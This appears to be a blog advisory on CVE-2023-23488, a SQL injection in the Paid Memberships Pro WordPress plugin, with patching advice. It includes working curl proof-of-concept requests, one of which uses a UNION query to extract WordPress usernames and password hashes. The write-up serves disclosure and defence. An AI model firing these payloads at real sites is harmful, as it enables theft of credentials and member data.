CVE-2023-23488 - Unauthenticated SQL Injection in Paid Memberships Pro (WordPress Plugin) – Exploit and Analysis

In early 2023, a serious security flaw was found in the popular Paid Memberships Pro WordPress plugin. This flaw (tracked as CVE-2023-23488) could allow hackers to break into vulnerable websites and steal or manipulate database information without logging in. This article breaks down how the attack works, shows example code, and explains how you can protect your WordPress site.

What is Paid Memberships Pro?

Paid Memberships Pro is a well-known WordPress plugin for managing memberships, subscriptions, and paywalled content. Thousands of sites use it to handle user subscriptions and payments.

The Vulnerability: SQL Injection via the REST API

CVE-2023-23488 affects versions below 2.9.8. The root problem is an unauthenticated SQL injection in the code parameter when sending a request to the /pmpro/v1/order REST endpoint.

SQL injection is a vulnerability where an attacker tricks a website into running dangerous SQL (database) commands. In this case, anyone on the internet—even without a valid account—could potentially steal, modify, or even delete sensitive information from the database through this bug.

Official Advisory:  
- Wordfence: High Severity Unauthenticated SQL Injection in Paid Memberships Pro
- NVD Entry: CVE-2023-23488

How Does the Exploit Work?

A key functionality allowed code to be passed as a GET or POST parameter in a REST API call. The code was directly used in an SQL query without proper sanitization or validation.

Technical Details

Here’s a simplified look at the vulnerable function (not the actual code, but conceptually similar):

// This is a general representation, not the real code
function get_order_by_code($code) {
    global $wpdb;
    // NOT SAFE: $code comes directly from user input!
    $query = "SELECT * FROM wp_pmpro_membership_orders WHERE code = '$code'";
    $order = $wpdb->get_row($query);
    return $order;
}

An attacker could send something like code=123' OR 1=1 -- - and the SQL would return all orders (or worse, if they inject more complex SQL).

Proof of Concept (PoC) Exploit

To exploit this, hackers would send a POST or GET request to the REST route /wp-json/pmpro/v1/order?code= with a malicious value.

Here’s a proof-of-concept using curl (replace the URL with your target)

curl -s -X GET \
  "http://targetsite.com/wp-json/pmpro/v1/order?code=123'%20OR%201=1%20--%20-";

If the site is vulnerable, this will cause the database to treat the query as

SELECT * FROM wp_pmpro_membership_orders WHERE code = '123' OR 1=1 -- -'

Which returns *all orders* (or allows further manipulation or data theft).

You can leverage UNION-based SQL Injection for data extraction. For example

curl -s \
  "http://targetsite.com/wp-json/pmpro/v1/order?code=anything'%20UNION%20SELECT%20user_login,user_pass,1,1,1%20FROM%20wp_users--%20-";

*(Be careful: hacking unauthorized websites is illegal! This is for educational/research and testing on your own sites only!)*

High severity: Because no authentication is needed.

- Data exposure: Attackers can access member information, payment history, admin credentials, and more.

Data manipulation: Possibly change, add, or remove data in the database.

- Full compromise: If combined with other bugs or by leaking password hashes, complete site takeover is possible.

How to Fix: Patch Your Plugin

Version 2.9.8 and above are safe!  
You must upgrade Paid Memberships Pro immediately if you’re running a version below 2.9.8.

Find Paid Memberships Pro and click "Update Now".

3. Or download the latest version from WordPress.org.

How to Check If You're Vulnerable

1. Visit https://yoursite.com/wp-json/pmpro/v1/order?code=test';

If you see an error or unexpected data, you might still be vulnerable.

Alternatively, scan your site with a security tool like Wordfence or WPScan.

Conclusion

CVE-2023-23488 is a critical, real-world example of why input validation and sanitization matter. Always keep your WordPress plugins—especially those involving user accounts and payments—up to date. If you need more details or help, check the references below.

References

- Wordfence Research on CVE-2023-23488
- National Vulnerability Database Entry (NVD)
- Vendor Changelog
- WPScan Vulnerability Report


If you found this helpful, make sure to patch all your sites and share this with others using Paid Memberships Pro!

Timeline

Published on: 01/20/2023 18:15:00 UTC
Last modified on: 04/03/2023 20:15:00 UTC